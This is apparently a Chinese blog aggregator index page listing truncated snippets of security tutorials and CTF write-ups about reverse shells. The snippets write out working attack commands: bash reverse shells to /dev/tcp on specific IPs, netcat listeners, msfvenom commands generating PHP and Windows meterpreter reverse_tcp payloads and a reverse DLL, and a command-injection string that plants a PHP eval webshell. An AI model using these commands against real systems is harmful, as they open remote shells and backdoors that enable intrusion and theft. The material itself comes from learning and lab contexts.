Bash TCP: Victim: bash -i >& /dev/tcp/175.11.142.54/443 0>&1 Copy /bin/bash -i > /dev/tcp/175.11.142.54/443 0<& 2>&1 Copy exec 5<>/dev/tcp/175.11.142. ...
分类:
系统相关 时间:
2020-04-29 00:58:32
阅读次数:
78
本机ip为10.10.10.11,监听端口443。 Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 然后在靶机上执行如下命令: Bash环境下反弹UDP协议shell: 首先在本地监听UDP协议443端口 然后在靶机上执行如下命令: 使用Netcat反弹shell 首先在 ...
分类:
系统相关 时间:
2020-04-13 12:21:13
阅读次数:
95
方法一:(bash反弹) 反弹shell命令如下: bash -i >& /dev/tcp/ip/port 0>&1 首先,使用nc在kali上监听端口: nc -lvp 7777 然后在目标机输入: bash -i >& /dev/tcp/192.168.0.30/4444 0>&1 可以看到sh ...
分类:
系统相关 时间:
2020-04-09 12:23:10
阅读次数:
145
0x01:介绍 在拿到一个反弹shell后,下一步可以用metaspolit的内置模块Local Exploit SuggesterLocal exploit suggester的功能就如它的名字一样,当我们用它来探测某一个系统时,他会告诉我们该系统有哪些exploit可能可以利用。但是由于该工具先 ...
分类:
其他好文 时间:
2020-03-27 21:39:46
阅读次数:
159
[V&N2020 公开赛]CHECKIN s1mple 那天,我见过的最强剑客,提起了天下最强的宝剑······却早已没了剑心。 知识点 反弹shell;;文件描述符;; 这里先引入一个知识点;文件描述符,在linux里,当一个进程打开某个文件直到关闭前,该进程会获得文件描述符,而文件描述符里有文件 ...
分类:
其他好文 时间:
2020-03-17 23:56:03
阅读次数:
394
晚上闲来无事,准备做个target,结果是各种错误。在睡觉前还是没有顺利的做出来。先将TroubleSHOOTing 总结如下: 在用hydra爆破mysql的时候,发现 'MySql Host is blocked because of many connection errors; unbloc ...
分类:
其他好文 时间:
2020-03-05 13:44:26
阅读次数:
61
一个简单的ping,还没有过滤,源码也给出来了 ls一下 127.0.0.1 & ls 有一个可疑的php文件,,,但是直接访问和 cat 都出不来。。。 试了几下反弹shell,没成功。。。于是直接用echo了一个一句话进去 127.0.0.1 & echo "<?php eval(@\$_POS ...
分类:
Web程序 时间:
2020-03-04 19:00:03
阅读次数:
495
一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下as ...
分类:
Web程序 时间:
2020-02-19 13:05:16
阅读次数:
266
一、运行exe程序反弹shell 需要先生成exe木马,然后将exe文件上传到服务器上,最后在服务器上运行该文件。可使用msfvenom生成exe木马。 二、加载dll文件反弹shell 需要先生成dll文件,然后使用regsvr32.exe加载dll。可使用msfvenom生成dll文件。 三、P ...
第一步:生成dll文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll 第二步:启动MSF等待回连 use exploit/mu ...
分类:
系统相关 时间:
2020-02-16 16:13:17
阅读次数:
132